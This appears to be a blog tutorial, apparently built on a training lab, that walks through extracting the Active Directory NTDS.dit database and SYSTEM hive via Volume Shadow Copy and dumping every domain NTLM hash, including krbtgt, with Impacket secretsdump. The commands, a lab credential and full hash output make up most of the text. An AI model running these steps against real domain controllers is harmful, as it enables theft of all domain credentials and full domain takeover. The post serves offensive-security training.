June 11, 2026
Active Directory Attacks — NTDS.dit Extraction
Osec
NTDS.dit (New Technology Directory Services Directory Information Tree) is the core database of Active Directory Domain Services. It stores all directory data, including user accounts, computer objects and, critically, password hashes.
From an offensive security perspective, NTDS.dit extraction is the act of copying this database from a Domain Controller and pairing it with the SYSTEM registry hive. The SYSTEM hive holds the boot key (system key), which decrypts the Password Encryption Key (PEK) stored inside NTDS.dit; the PEK in turn decrypts each account's stored hash. With both files an attacker can recover the NTLM hash of every account in the domain and either crack the hashes offline or use them directly in Pass-the-Hash attacks.
Because this approach reads the data layer directly instead of authenticating against live services, it triggers no account lockouts or failed-logon events and yields the entire credential set, Domain Admins and the krbtgt account included, in one operation. It is not invisible, though: creating a shadow copy and copying the database out are host-level actions on the DC that process-creation auditing (Security event 4688 with command-line logging enabled) or an EDR will record.
Attack
NTDS.dit extraction is a post-compromise, domain-dominance technique: one operation yields the entire Active Directory credential set.
Attack flow:
- Gain elevated access: the attacker first obtains Domain Admin privileges or SYSTEM-level access on a Domain Controller.
- Locate the Active Directory database: the target is the file NTDS.dit, which stores all domain credential data.
- Create a safe copy of the locked file: because the database is held open by the directory service, the attacker uses Volume Shadow Copy or backup abuse to obtain a consistent copy.
- Collect the supporting data: the SYSTEM registry hive is copied as well, since it holds the boot key needed to decrypt the stored credentials.
- Extract offline: using a tool such as Impacket's secretsdump, the attacker parses the database and extracts the NTLM password hashes.
For the demo we will extract NTDS.dit using the Volume Shadow Copy technique.
First, let's confirm the location of the NTDS.dit file. C:\Windows\NTDS is the default, but the path is chosen at DC promotion; if the file is not there, the "DSA Database file" value under HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters gives the real location.
ls C:\Windows\NTDS\ntds.dit

Directory: C:\Windows\NTDS

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/30/2026 3:40 AM 88080384 ntds.dit

Now let's create a volume shadow copy of the C: volume:
vssadmin.exe create shadow /for=C:

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
(C) Copyright 2001-2013 Microsoft Corp.

Successfully created shadow copy for 'C:\'
Shadow Copy ID: {ef4eadbf-a9ad-445d-9688-d985447e681c}
Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1

Now let's copy the files we need out of the shadow copy so we can process them on our own system. The device path must match the Shadow Copy Volume Name printed above (a second run would produce HarddiskVolumeShadowCopy2):
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Extracted\NTDS.dit
cmd.exe /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\system32\config\system C:\Extracted\system
dir

Volume in drive C has no label.
Volume Serial Number is B8B3-0D72

Directory of C:\extracted

03/30/2026 04:30 AM <DIR> .
03/30/2026 04:30 AM <DIR> ..
03/30/2026 03:40 AM 88,080,384 NTDS.dit
02/16/2022 02:32 PM 17,039,360 system

The NTDS.dit size matches the live file, so the copy is complete. Once both files are verified, delete the shadow copy so it is not left behind (vssadmin delete shadows /shadow={ef4eadbf-a9ad-445d-9688-d985447e681c}). Now let's transfer the files to our attacking machine. Here they had been packed into extracted.rar on the user's desktop (the archiving step is not shown) and are pulled over SMB with smbget:
smbget smb://INLANEFREIGHT.LOCAL/users/htb-student_adm/desktop/extracted.rar -U 'INLANEFREIGHT.LOCAL/htb-student_adm'%'Academy_student_DA!'

Then extract them from the .rar archive:
unrar x extracted.rar

UNRAR 6.20 beta 2 freeware Copyright (c) 1993-2022 Alexander Roshal

Extracting from extracted.rar

Extracting NTDS.dit OK
Extracting system OK
All OK

Now let's extract the credentials. The LOCAL target tells secretsdump to parse the two files offline instead of connecting to a host; the boot key it reads from the SYSTEM hive unlocks the PEK, which then decrypts every hash in NTDS.dit:
impacket-secretsdump -ntds NTDS.dit -system system LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x0e79d2e5d9bad2639da4ef244b30fda5
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: a9707d46478ab8b3ea22d8526ba15aa6
[*] Reading and decrypting hashes from NTDS.dit
INLANEFREIGHT.LOCAL\Administrator:500:aad3b435b51404eeaad3b435b51404ee:88ad09182de639ccc6579eb0849751cf:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
lab_adm:1001:aad3b435b51404eeaad3b435b51404ee:663715a1a8b957e8e9943cc98ea451b6:::
ACADEMY-EA-DC01$:1002:aad3b435b51404eeaad3b435b51404ee:458260fc91c9ac58626bdf85ce8d51eb:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:16e26ba33e455a8c338142af8d89ffbc:::
ACADEMY-EA-MS01$:1107:aad3b435b51404eeaad3b435b51404ee:b5bcf4eba76a7f70d095871d00580bb5:::
ACADEMY-EA-WEB01$:1108:aad3b435b51404eeaad3b435b51404ee:1c7e2801ca48d0a5e3d5baf9e68367ac:::
INLANEFREIGHT.LOCAL\htb-student:1111:aad3b435b51404eeaad3b435b51404ee:2487a01dd672b583415cb52217824bb5:::
inlanefreight.local\AVazquez:1112:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::
inlanefreight.local\PFalcon:1113:aad3b435b51404eeaad3b435b51404ee:f8e656de86b8b13244e7c879d8177539:::
inlanefreight.local\FAnthony:1114:aad3b435b51404eeaad3b435b51404ee:9827f62cf27fe221b4e89f7519a2092a:::
inlanefreight.local\WDillard:1115:aad3b435b51404eeaad3b435b51404ee:69ada25bbb693f9a85cd5f176948b0d5:::
inlanefreight.local\LBradford:1116:aad3b435b51404eeaad3b435b51404ee:0717dbc7b0e91125777d3ff4f3c00533:::
inlanefreight.local\SGage:1117:aad3b435b51404eeaad3b435b51404ee:31501a94e6027b74a5710c90d1c7f3b9:::
inlanefreight.local\ASanchez:1118:aad3b435b51404eeaad3b435b51404ee:c6885c0fa57ec94542d362cf7dc2d541:::
inlanefreight.local\DBranch:1119:aad3b435b51404eeaad3b435b51404ee:a87c92932b0ef15f6c9c39d6406c3a75:::
inlanefreight.local\CCruz:1120:aad3b435b51404eeaad3b435b51404ee:a9be3a88067ed776d0e2cf4ccde8ec8f:::
inlanefreight.local\NJohnson:1121:aad3b435b51404eeaad3b435b51404ee:1b2a9f3b6d785e695aadfe3485a2601f:::
inlanefreight.local\MHolliday:1122:aad3b435b51404eeaad3b435b51404ee:cf3a5525ee9414229e66279623ed5c58:::
inlanefreight.local\MShoemaker:1123:aad3b435b51404eeaad3b435b51404ee:c15d04d9a989b3c9f1d2db979ffa325f:::
inlanefreight.local\ASlater:1124:aad3b435b51404eeaad3b435b51404ee:e7d0a88542cb44ab48e5a89d864f8146:::
inlanefreight.local\KPrentiss:1125:aad3b435b51404eeaad3b435b51404ee:9b12a0a33aabdbd845cd3ed5070820b9:::
inlanefreight.local\GDavis:1126:aad3b435b51404eeaad3b435b51404ee:1ab3ee9bd2e35ad25670481d9d1b4e0f:::
inlanefreight.local\JMcDaniel:1127:aad3b435b51404eeaad3b435b51404ee:1e22653293daff337f58d32695c999d0:::
inlanefreight.local\JJones:1128:aad3b435b51404eeaad3b435b51404ee:a90431144f59bc8aeecc28038d6bda40:::
inlanefreight.local\TGarcia:1129:aad3b435b51404eeaad3b435b51404ee:8a4c52fc75514ddb740971e26b9311d9:::
inlanefreight.local\MHarrison:1130:aad3b435b51404eeaad3b435b51404ee:4befb46af523d5899f605eb13fa91788:::
inlanefreight.local\NHight:1131:aad3b435b51404eeaad3b435b51404ee:9dbd90a7155594a3950791b2a20b90dd:::
inlanefreight.local\WBaird:1132:aad3b435b51404eeaad3b435b51404ee:f30ba55f393d631be27cc76b385af8f9:::
inlanefreight.local\MOchoa:1133:aad3b435b51404eeaad3b435b51404ee:0d2134c49735d6b979b0ee3adf520d4b:::
inlanefreight.local\JHopkins:1134:aad3b435b51404eeaad3b435b51404ee:eae13b6506b3112fee868ba26c1ade92:::
inlanefreight.local\HBlea:1135:aad3b435b51404eeaad3b435b51404ee:4bfd7bb2c984e909198c2a4033d58806:::
inlanefreight.local\CPennington:1136:aad3b435b51404eeaad3b435b51404ee:4bf9a20fec430ee1044186d6648ff53b:::
inlanefreight.local\DGlen:1137:aad3b435b51404eeaad3b435b51404ee:e931895043becfd796833abaee641077:::
inlanefreight.local\KHartsfield:1138:aad3b435b51404eeaad3b435b51404ee:4bb3b317845f0954200a6b0acc9b9f9a:::
inlanefreight.local\RRamirez:1139:aad3b435b51404eeaad3b435b51404ee:0a280608abf79943bf7a2e40fc784ead:::
inlanefreight.local\OHafner:1140:aad3b435b51404eeaad3b435b51404ee:7ee9b4d39c6820c17e12c85f9f02e9cc:::
inlanefreight.local\LMatthews:1141:aad3b435b51404eeaad3b435b51404ee:8289a143c7331424c71d6f1b72c12a65:::
inlanefreight.local\LOkeefe:1142:aad3b435b51404eeaad3b435b51404ee:1628488e442316500a176701e0ac3c54:::
inlanefreight.local\RBurrows:1143:aad3b435b51404eeaad3b435b51404ee:d7ac98d21ce1a53f95439a284b1cc6f0:::
inlanefreight.local\CSteele:1144:aad3b435b51404eeaad3b435b51404ee:181f57e0ff08a1f715faefe0e37fac33:::
inlanefreight.local\JWallace:1145:aad3b435b51404eeaad3b435b51404ee:def7529e4a2ef752ac49748b5e14fbed:::
inlanefreight.local\DLewis:1146:aad3b435b51404eeaad3b435b51404ee:cab905919f78bc291d18602fa2637006:::
inlanefreight.local\JSantiago:1147:aad3b435b51404eeaad3b435b51404ee:b112ae11884f96fae6b6bf45763975bf:::

And like that, we hold the NTLM hashes of every account in the domain, users and machine accounts alike. Two values in the output are worth recognising on sight: the Guest hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty password (MD4 of the empty string), and aad3b435b51404eeaad3b435b51404ee in the LM column simply means no LM hash is stored. The krbtgt hash is the one we will use to perform the Golden Ticket attack in the next article ;)
Make sure you subscribe so you get notified whenever a new article drops!
Follow me on X : https://x.com/osec403